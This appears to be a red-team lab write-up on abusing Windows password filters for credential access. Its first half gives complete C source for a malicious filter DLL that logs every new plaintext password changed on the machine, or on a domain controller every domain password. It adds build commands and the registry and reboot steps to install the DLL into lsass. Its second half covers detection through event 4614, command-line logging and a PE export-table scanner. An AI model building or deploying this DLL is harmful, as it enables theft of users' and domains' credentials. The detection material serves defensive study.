T1174: Password Filter

Credential Access

This lab explores Windows password filters: DLLs that the Local Security Authority (LSA) loads into lsass.exe and calls whenever a local or domain account password is set or changed, so that the filter can validate the new password against a policy. Since a filter receives the new password in plaintext, an attacker who can register one intercepts and logs every password change on that machine, or on a domain controller every domain password change.

Execution

Password filters are registered in the registry under the LSA key, in the Notification Packages value (REG_MULTI_SZ, one entry per DLL, given by base name without the .dll extension). We can list the registered packages with:

attacker@victim
reg query "hklm\system\currentcontrolset\control\lsa" /v "notification packages"

Or via regedit:

The evil filter DLL is based on a great article by mubix, who has also kindly provided the code. I modified it slightly to make sure that the critical DLL functions (InitializeChangeNotify, PasswordChangeNotify and PasswordFilter, which LSA resolves by name) were exported correctly, since mubix's code did not work for me out of the box. I also had to change the logging statements to fix a couple of compiler issues:

Password Filter DLL
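The following is an added example written for this page; it is not mubix's code and not the DLL used in the lab. It is a minimal password filter in C with the three entry points LSA looks up by name (InitializeChangeNotify, PasswordFilter and PasswordChangeNotify) and the signatures documented for them. The log path, the log line format and the non-Windows type shim under `#else` (there only so the logging logic can be compiled and tested off a Windows box) are assumptions of this example.

```c
/*
 * evilfilter.c: password filter DLL that logs every new password LSA hands it.
 * Windows build (64-bit): cl /LD evilfilter.c   or   gcc -shared -o evilfilter.dll evilfilter.c
 * Everything under #else stands in for the Windows types so the logging logic
 * can be compiled and unit-tested off-Windows (assumption: test builds only).
 */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#ifdef _WIN32
#  include <windows.h>
#  include <ntsecapi.h>            /* declares the three filter entry points */
#  define PWF_EXPORT __declspec(dllexport)
#  define LOG_PATH "C:\\Windows\\Temp\\passwords.txt"   /* assumed drop location */
#else
#  include <stdint.h>
typedef unsigned char BOOLEAN;
typedef int32_t NTSTATUS;
typedef uint32_t ULONG;
typedef uint16_t USHORT;
typedef uint16_t WCHAR;            /* UTF-16 code unit, like the Windows WCHAR */
typedef struct _UNICODE_STRING {
    USHORT Length;                 /* in BYTES, and Buffer is not NUL-terminated */
    USHORT MaximumLength;
    WCHAR *Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#  define NTAPI
#  define PWF_EXPORT
#  define TRUE 1
#  define LOG_PATH "passwords.txt"
#endif

#ifndef STATUS_SUCCESS
#  define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif

/* Narrow a UNICODE_STRING into a NUL-terminated char buffer. Length is a byte
 * count and Buffer has no terminator, so wcslen/%ls must never be used on it.
 * Non-ASCII code units become '?'. Returns the number of characters written. */
static size_t ustr_to_ascii(PUNICODE_STRING s, char *out, size_t outlen)
{
    size_t n = 0;
    if (outlen == 0) return 0;
    if (s != NULL && s->Buffer != NULL) {
        size_t chars = s->Length / sizeof(WCHAR);
        for (size_t i = 0; i < chars && n + 1 < outlen; i++) {
            WCHAR c = s->Buffer[i];
            out[n++] = (c < 0x80) ? (char)c : '?';
        }
    }
    out[n] = '\0';
    return n;
}

/* Build the "user:rid:password" line that gets written. Kept separate from the
 * export so it can be tested without loading the DLL into lsass.exe. */
int format_log_line(PUNICODE_STRING user, ULONG rid, PUNICODE_STRING pw,
                    char *out, size_t outlen)
{
    char u[256], p[256];
    ustr_to_ascii(user, u, sizeof u);
    ustr_to_ascii(pw, p, sizeof p);
    return snprintf(out, outlen, "%s:%lu:%s", u, (unsigned long)rid, p);
}

/* Called once when LSA loads the package at boot; TRUE = keep the filter loaded. */
PWF_EXPORT BOOLEAN NTAPI InitializeChangeNotify(void)
{
    return TRUE;
}

/* Called BEFORE the change is committed. Returning TRUE accepts any password so
 * the user sees nothing unusual; a legitimate filter would enforce policy here. */
PWF_EXPORT BOOLEAN NTAPI PasswordFilter(PUNICODE_STRING AccountName, PUNICODE_STRING FullName,
                                        PUNICODE_STRING Password, BOOLEAN SetOperation)
{
    (void)AccountName; (void)FullName; (void)Password; (void)SetOperation;
    return TRUE;
}

/* Called AFTER the change succeeded, with the new plaintext password: log it.
 * This runs inside lsass.exe, i.e. as SYSTEM, so LOG_PATH must be SYSTEM-writable. */
PWF_EXPORT NTSTATUS NTAPI PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId,
                                               PUNICODE_STRING NewPassword)
{
    char line[600];
    format_log_line(UserName, RelativeId, NewPassword, line, sizeof line);
    FILE *f = fopen(LOG_PATH, "a");
    if (f != NULL) {
        fprintf(f, "%s\n", line);
        fclose(f);
    }
    return STATUS_SUCCESS;   /* the documented return value for this routine */
}
```

Because the file is C rather than C++ there is no name mangling, which is the usual reason the exports come out decorated and LSA fails to find them; a 32-bit build additionally needs a .def file, since __stdcall appends @N to the exported names on x86 (on x64 the names are exported undecorated as-is). To install it: copy evilfilter.dll to %systemroot%\system32, append evilfilter (no extension) to the Notification Packages REG_MULTI_SZ (reg add replaces the whole value, so the existing entries such as scecli must be kept), and reboot, since LSA only loads the packages at startup.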

Installing the evil password filter on the victim system (the DLL goes into %systemroot%\system32, its name is appended to Notification Packages, and the box is rebooted, since LSA only loads the packages at startup):

Testing password changes after the reboot; note how each new password is logged in plaintext:

Observations

Security event ID 4614 ("A notification package has been loaded by the Security Account Manager") is recorded for every package LSA loads, so an unfamiliar package name in these events is a strong indicator:

Command line logging can also help in detecting this activity, since the attacker has to write the Notification Packages value at some point:

...especially if the package named in that command has only recently been dropped to disk:

Also, it may be worth checking new DLLs dropped into %systemroot%\system32 for an exported PasswordChangeNotify function:
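As an added example (not part of the original page), here is a small C program that performs that check by parsing the PE export table directly rather than calling LoadLibrary, since loading a suspect DLL would execute its DllMain. It takes any export name, so the same tool can look for PasswordFilter and InitializeChangeNotify too. The image produced by build_sample_dll is constructed test input (a non-loadable PE32+ shell with nothing but an export table), not a real DLL; the field offsets are those of the PE/COFF format.

```c
/*
 * has_export.c: does a DLL export a given function? Answered by parsing the
 * PE export table from the raw file, without loading the DLL.
 * Added example; PE field offsets follow the PE/COFF specification.
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *b, size_t o) { return (uint16_t)(b[o] | (b[o + 1] << 8)); }
static uint32_t rd32(const uint8_t *b, size_t o) { return rd16(b, o) | ((uint32_t)rd16(b, o + 2) << 16); }
static void wr16(uint8_t *b, size_t o, uint16_t v) { b[o] = (uint8_t)v; b[o + 1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *b, size_t o, uint32_t v) { wr16(b, o, (uint16_t)v); wr16(b, o + 2, (uint16_t)(v >> 16)); }

/* Map an RVA to a file offset through the section table; SIZE_MAX if unmapped. */
static size_t rva_to_off(const uint8_t *b, size_t len, size_t sect, unsigned nsect, uint32_t rva)
{
    for (unsigned i = 0; i < nsect; i++, sect += 40) {
        if (sect + 40 > len) return SIZE_MAX;
        uint32_t va = rd32(b, sect + 12), raw = rd32(b, sect + 16), ptr = rd32(b, sect + 20);
        if (rva >= va && rva < va + raw) return (size_t)ptr + (rva - va);
    }
    return SIZE_MAX;
}

/* 1 if the PE image in b exports `name`, 0 if not, -1 if b is not a parseable PE. */
int pe_has_export(const uint8_t *b, size_t len, const char *name)
{
    if (len < 0x40 || rd16(b, 0) != 0x5A4D) return -1;               /* "MZ" */
    size_t pe = rd32(b, 0x3C);
    if (pe + 26 > len || rd32(b, pe) != 0x00004550) return -1;        /* "PE\0\0" */
    unsigned nsect = rd16(b, pe + 6);
    size_t opt = pe + 24, sect = opt + rd16(b, pe + 20);              /* SizeOfOptionalHeader */
    size_t dd = (rd16(b, opt) == 0x20B) ? 112 : 96;                   /* DataDirectory offset, PE32+ vs PE32 */
    if (opt + dd + 8 > len || rd32(b, opt + dd - 4) < 1) return -1;   /* NumberOfRvaAndSizes */
    uint32_t exp_rva = rd32(b, opt + dd);                             /* DataDirectory[0] = export table */
    if (exp_rva == 0) return 0;                                       /* no exports at all */
    size_t ed = rva_to_off(b, len, sect, nsect, exp_rva);
    if (ed == SIZE_MAX || ed + 40 > len) return -1;
    uint32_t nnames = rd32(b, ed + 24);                               /* NumberOfNames */
    size_t names = rva_to_off(b, len, sect, nsect, rd32(b, ed + 32)); /* AddressOfNames */
    for (uint32_t i = 0; i < nnames; i++) {
        if (names == SIZE_MAX || names + 4 * (size_t)i + 4 > len) return -1;
        size_t s = rva_to_off(b, len, sect, nsect, rd32(b, names + 4 * (size_t)i));
        if (s >= len || memchr(b + s, 0, len - s) == NULL) return -1;  /* name must end inside the buffer */
        if (strcmp((const char *)b + s, name) == 0) return 1;
    }
    return 0;
}

/* Constructed test input: a minimal, non-loadable PE32+ "DLL" whose only section
 * is an export table listing `names`. Returns the image size, 0 if it does not fit. */
size_t build_sample_dll(uint8_t *out, size_t cap, const char **names, unsigned n)
{
    const size_t hdr = 0x200, sec = 0x200, rva = 0x1000;   /* headers, then one section at RVA 0x1000 */
    if (cap < hdr + sec) return 0;
    memset(out, 0, hdr + sec);
    wr16(out, 0, 0x5A4D); wr32(out, 0x3C, 0x40);          /* MZ, e_lfanew */
    size_t pe = 0x40, opt = pe + 24, sh = opt + 240;
    wr32(out, pe, 0x00004550); wr16(out, pe + 4, 0x8664);  /* PE\0\0, AMD64 */
    wr16(out, pe + 6, 1); wr16(out, pe + 20, 240);         /* 1 section, PE32+ optional header size */
    wr16(out, pe + 22, 0x2022);                            /* EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL */
    wr16(out, opt, 0x20B); wr32(out, opt + 108, 16);       /* PE32+ magic, NumberOfRvaAndSizes */
    wr32(out, opt + 112, (uint32_t)rva); wr32(out, opt + 116, (uint32_t)sec);   /* export directory */
    memcpy(out + sh, ".edata", 6);
    wr32(out, sh + 8, (uint32_t)sec); wr32(out, sh + 12, (uint32_t)rva);       /* VirtualSize, VirtualAddress */
    wr32(out, sh + 16, (uint32_t)sec); wr32(out, sh + 20, (uint32_t)hdr);      /* SizeOfRawData, PointerToRawData */
    size_t ed = hdr, funcs = ed + 40, nm = funcs + 4 * n, ords = nm + 4 * n, str = ords + 2 * n;
    wr32(out, ed + 20, n); wr32(out, ed + 24, n);          /* NumberOfFunctions, NumberOfNames */
    wr32(out, ed + 28, (uint32_t)(rva + funcs - hdr));     /* AddressOfFunctions */
    wr32(out, ed + 32, (uint32_t)(rva + nm - hdr));        /* AddressOfNames */
    wr32(out, ed + 36, (uint32_t)(rva + ords - hdr));      /* AddressOfNameOrdinals */
    for (unsigned i = 0; i < n; i++) {
        size_t l = strlen(names[i]) + 1;
        if (str + l > hdr + sec) return 0;
        memcpy(out + str, names[i], l);
        wr32(out, nm + 4 * i, (uint32_t)(rva + str - hdr));
        wr32(out, funcs + 4 * i, (uint32_t)(rva + sec - 16)); /* dummy code RVA */
        wr16(out, ords + 2 * i, (uint16_t)i);
        str += l;
    }
    return hdr + sec;
}

/* Stand-alone use: has_export <file.dll> <ExportName>; exit 0 only when found. */
int main(int argc, char **argv)
{
    static uint8_t buf[64 << 20];
    if (argc != 3) { fprintf(stderr, "usage: %s <dll> <export>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) { perror(argv[1]); return 2; }
    size_t len = fread(buf, 1, sizeof buf, f);
    fclose(f);
    int r = pe_has_export(buf, len, argv[2]);
    const char *msg = r == 1 ? "exports" : r == 0 ? "does not export" : "could not be parsed for";
    printf("%s %s %s\n", argv[1], msg, argv[2]);
    return r == 1 ? 0 : 1;
}
```

Run it over every DLL in %systemroot%\system32 and alert on hits that are not already listed in Notification Packages or that fail signature checks; the built-in entries such as scecli export the same three functions legitimately, so the signal is a DLL that is new to the directory or new to the list, not the export on its own.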
